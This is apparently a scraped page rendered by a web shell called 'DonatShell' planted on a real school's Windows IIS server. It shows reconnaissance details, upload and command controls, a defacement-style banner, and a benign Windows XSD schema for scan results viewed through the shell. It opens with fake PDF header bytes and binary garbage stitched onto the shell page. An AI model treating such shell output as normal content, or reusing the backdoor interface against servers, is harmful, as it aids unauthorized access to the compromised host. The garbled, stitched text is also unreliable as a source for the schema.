%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : www.kowitt.ac.th  /  Your IP : 216.73.216.118
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Windows/security/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/Windows/security/RuleResults.xsd
<?xml version="1.0" encoding="utf-8" ?>
<xsd:schema elementFormDefault="qualified" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <!--
        CheckResults is the top level element for the extensions scan results.
        it is attributed by the extension Name as well as the max severity reported by
        the extension. Optionaly the extension could supply a link to be associated
        with its results.
        CheckResults contains Items element which is a list of items reported by the extension.
    -->
	<xsd:element name="CheckResults">
		<xsd:complexType>
			<xsd:sequence>
				<xsd:element name="Items" type="ItemsType" minOccurs="0" maxOccurs="1" />
			</xsd:sequence>
			<xsd:attribute name="Name" type="xsd:string" use="required" />
			<xsd:attribute name="Version" type="xsd:string" use="required" />
			<xsd:attribute name="Severity" type="xsd:string" use="required" />
			<xsd:attribute name="Link" type="xsd:string" use="optional" />
			<xsd:attribute name="Tag" type="xsd:string" use="optional"/>
		</xsd:complexType>
	</xsd:element>
	<xsd:complexType name="ItemsType">
		<xsd:sequence>
			<xsd:element name="Item" type="ItemType" minOccurs="0" maxOccurs="unbounded" />
		</xsd:sequence>
	</xsd:complexType>
    <!--
        Each Item has a severity, and primary key and value attributes.
        Each Item can contain properties and/or propertygroups.
    -->
	<xsd:complexType name="ItemType">
		<xsd:sequence>
			<xsd:element name="Property" type="PropertyType" minOccurs="0" maxOccurs="unbounded" />
			<xsd:element name="PropertyGroup" type="PropertyGroupType" minOccurs="0" maxOccurs="unbounded" />
			<xsd:element name="Remediation" type="RemedationType" minOccurs="0" maxOccurs="1"/>
		</xsd:sequence>
		<xsd:attribute name="Severity" type="xsd:string" use="required" />
		<xsd:attribute name="Key" type="xsd:string" use="required" />
		<xsd:attribute name="Value" type="xsd:string" use="required" />
	</xsd:complexType>
    <!--
        A propertygroup is a keyed collection of sub properties and/or propertygroups.
    -->
	<xsd:complexType name="PropertyGroupType">
		<xsd:sequence minOccurs="0" maxOccurs="unbounded">
			<xsd:element name="Property" type="PropertyType" minOccurs="0" maxOccurs="unbounded" />
			<xsd:element name="PropertyGroup" type="PropertyGroupType" minOccurs="0" maxOccurs="unbounded" />
		</xsd:sequence>
		<xsd:attribute name="Key" type="xsd:string" use="optional" />
	</xsd:complexType>
    <!--
        a Property is a Keyed list of arbitrary Fields.
    -->
	<xsd:complexType name="PropertyType">
		<xsd:sequence>
			<xsd:element name="Field" type="AnyContentType" minOccurs="0" maxOccurs="unbounded" />
		</xsd:sequence>
		<xsd:attribute name="Key" type="xsd:string" use="required" />
	</xsd:complexType>
	
	<xsd:complexType name="RemedationType">
	    <xsd:sequence>
	        <xsd:any processContents="skip" minOccurs="0" maxOccurs="unbounded" />
	    </xsd:sequence>
	</xsd:complexType>
	
    <xsd:complexType name="AnyContentType" mixed="true">
	    <xsd:sequence>
	        <xsd:any processContents="skip" minOccurs="0" maxOccurs="unbounded" />
	    </xsd:sequence>
	</xsd:complexType>	
</xsd:schema>

Anon7 - 2022
AnonSec Team